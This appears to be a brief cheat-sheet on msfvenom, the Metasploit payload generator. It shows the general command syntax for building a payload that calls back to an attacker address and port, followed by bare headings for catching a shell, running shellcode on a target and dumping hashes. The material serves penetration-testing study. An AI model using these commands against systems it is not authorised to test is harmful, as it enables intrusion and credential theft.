Msfvenom
General syntax
$ msfvenom --payload <payload> --format <format> --platform <platform> --arch <architecture> LHOST=<ATTACKER_ADDR> LPORT=<ATTACKER_LISTEN_PORT> --output <output_file>
# short form options
$ msfvenom -p <payload> -f <format> --platform <platform> -a <architecture> LHOST=<ATTACKER_ADDR> LPORT=<ATTACKER_LISTEN_PORT> -o <output_file>Help menu
List available options for module type
Payload option
General payload naming convention
Common payloads
Format option
Template
CMD
Example
Module to use on the attacking machine to catch a shell
Run the shellcode on the target machine
Gain meterpreter shell on the attacker machine
Using post exploitation hash dump module
Last updated